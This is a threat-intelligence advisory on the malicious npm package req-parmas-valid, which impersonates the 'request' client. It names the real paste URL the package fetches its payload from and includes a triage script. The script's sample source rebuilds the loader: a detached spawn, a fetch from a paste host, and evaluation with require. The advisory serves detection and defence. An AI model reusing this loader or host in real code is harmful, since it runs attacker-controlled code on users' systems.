Supply-chain threat intelligence

Incident detail

critical · npm · malware · osv

Malicious code in req-parmas-valid (npm)

req-parmas-valid

Risk score

92

AI summary

Indexed incident for req-parmas-valid (npm).

Description

Package name req-parmas-valid impersonates the well-known request HTTP client (description copied verbatim as 'Simplified HTTP request client.', bugs.url points at github.com/request/request/issues, README and most source copied from upstream). Bolted onto the copied source is a malicious middleware export (also exposed as reqValidator and the package's default export) which spawns a detached node lib/callers.js child process. lib/callers.js performs an HTTPS GET to https://www.jsonkeeper.com/b/DDC6J (an anonymous, mutable paste host), reads the Cookie field of the JSON response, and evaluates it via new Function.constructor("require", s)(require) — handing the fetched bytes full Node require capability with no integrity check, no pinning, and a payload host completely alien to the package's advertised purpose. Any consumer that imports and uses the middleware (the obvious Express-style API shape) executes arbitrary remote code controlled by whoever currently owns the paste.
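As an added illustration, not ThreatPkg's tooling or any code from the package: a static triage check that flags the traits described above (metadata copied from a well-known package under a different name, a detached child process, a fetch from a mutable paste host, and a fetched string handed to the Function constructor together with require), run over a constructed sample modelled on this description. The known-package table, the paste-host set, the sample package.json and the sample source are all assumptions, and the paste id is a placeholder.

```javascript
// Added example: static triage for the impersonation + remote-eval loader pattern.
// KNOWN_PACKAGES and PASTE_HOSTS are constructed stand-ins for real reference data.
const KNOWN_PACKAGES = {
  request: { description: "Simplified HTTP request client.", repo: "github.com/request/request" },
};
const PASTE_HOSTS = new Set(["jsonkeeper.com"]);

// Patterns for the loader behaviour the advisory describes.
const DYNAMIC_CODE_WITH_REQUIRE = /new\s+Function(?:\.constructor)?\s*\(\s*["']require["']/;
const DETACHED_SPAWN = /\bspawn\s*\([\s\S]{0,300}?detached\s*:\s*true/;
const URL_HOST = /https?:\/\/(?:www\.)?([a-z0-9.-]+)/gi;

// Returns a sorted, de-duplicated list of finding tags for one package.
function triagePackage(pkg, source) {
  const findings = new Set();
  const bugsUrl = typeof pkg.bugs === "string" ? pkg.bugs : (pkg.bugs && pkg.bugs.url) || "";
  // 1. Description or bug tracker lifted from a well-known package, published under another name.
  for (const [name, meta] of Object.entries(KNOWN_PACKAGES)) {
    if (pkg.name !== name && (pkg.description === meta.description || bugsUrl.includes(meta.repo))) {
      findings.add(`metadata-impersonation:${name}`);
    }
  }
  // 2. A runtime string is compiled into a function that receives require().
  if (DYNAMIC_CODE_WITH_REQUIRE.test(source)) findings.add("dynamic-code-with-require");
  // 3. A detached child process that outlives the caller's request handler.
  if (DETACHED_SPAWN.test(source)) findings.add("detached-child-process");
  // 4. Outbound requests to anonymous, mutable paste hosts.
  for (const m of source.matchAll(URL_HOST)) {
    const host = m[1].toLowerCase();
    if (PASTE_HOSTS.has(host)) findings.add(`paste-host-fetch:${host}`);
  }
  return [...findings].sort();
}

// Constructed sample modelled on the advisory text (placeholder paste id, not the real one).
const SAMPLE_PKG = {
  name: "req-parmas-valid",
  description: "Simplified HTTP request client.",
  bugs: { url: "https://github.com/request/request/issues" },
};
const SAMPLE_SOURCE = `
const { spawn } = require("child_process");
module.exports = function middleware(req, res, next) {
  spawn(process.execPath, ["lib/callers.js"], { detached: true, stdio: "ignore" }).unref();
  next();
};
// lib/callers.js
https.get("https://www.jsonkeeper.com/b/PLACEHOLDER", handleResponse);
const run = (s) => new Function.constructor("require", s)(require);
`;

if (typeof require !== "undefined" && require.main === module) console.log(triagePackage(SAMPLE_PKG, SAMPLE_SOURCE));
```

Any one tag alone is a prompt for manual review; the full set on a package whose name differs from the one it copies is the combination this incident shows.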

Technical details

Affected versions

=1.0.2

Indicators

  • affected version=1.0.2 (75%)

Timeline

  1. Advisory published
  2. Indexed by ThreatPkg

Related incidents